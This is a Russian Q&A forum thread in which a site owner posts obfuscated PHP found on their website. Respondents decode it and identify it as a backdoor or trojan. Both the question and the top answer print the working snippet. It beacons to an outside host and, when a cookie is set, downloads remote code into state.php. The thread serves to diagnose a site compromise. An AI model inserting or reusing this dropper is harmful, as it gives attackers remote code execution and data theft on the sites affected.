Задать вопрос
ProgerAN
@ProgerAN
php

Php код на сайте?

Я php не особо силен но не могли бы вы мне помочь что это за код
if (!isset($_COOKIE[base64_decode('X3ltX2l1cw==')])) { @file_get_contents(base64_decode('aHR0cDovL2wxbDAuY29tL3Av').$_SERVER['HTTP_HOST']); @setcookie(base64_decode('X3ltX2l1cw=='), 1, time()+31536000, '/', $_SERVER['HTTP_HOST']); } if (isset($_COOKIE[base64_decode('cmVkNHU=')])) { @file_put_contents(base64_decode('c3RhdGUucGhw'), @file_get_contents(base64_decode('aHR0cDovL2wxbDAuY29tL2QudHh0'))); }
  • Вопрос задан
  • 339 просмотров
Комментировать
Подписаться 1 Средний Комментировать
Решения вопроса 1
@BorisKorobkov Куратор тега PHP
Web developer
Бэкдор это. Вас взломали.

if (!isset($_COOKIE['_ym_ius'])) {
	@file_get_contents('http://l1l0.com/p/' . $_SERVER['HTTP_HOST']);
	@setcookie('_ym_ius', 1, time() + 31536000, '/', $_SERVER['HTTP_HOST']);
}

if (isset($_COOKIE['red4u'])) {
	@file_put_contents('state.php', @file_get_contents('http://l1l0.com/d.txt'));
}
Ответ написан
2 комментария
2 комментария
Пригласить эксперта
Ответы на вопрос 1
@l4m3r
Троян. Скачивает какой-то php с l1l0.com/p чтобы затем мамкин хакер мог выполнить его по прямой ссылке. А там, скорей всего, воровство файлов твоих и паролей или еще чего.
Глянь код этого state.php
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
Вакансии с Хабр Карьеры
PHP Developer
YCLIENTS Москва
от 200 000 до 350 000 ₽
PHP разработчик
Ведисофт Екатеринбург
от 25 000 ₽
Midlle PHP developer (backend)
ИТЦ Аусферр Магнитогорск
от 100 000 до 160 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Приложение или модуль для Wordpress для учета поездок по QR
25 апр. 2024, в 03:58
10000 руб./за проект
Ошибка в 1с при выгрузке товаров на сайт на Битриксе
25 апр. 2024, в 03:08
3000 руб./за проект
Создание и публикация короткого (reels) UGC-видео на YouTube-канале
25 апр. 2024, в 01:46
500 руб./за проект
Ещё заказы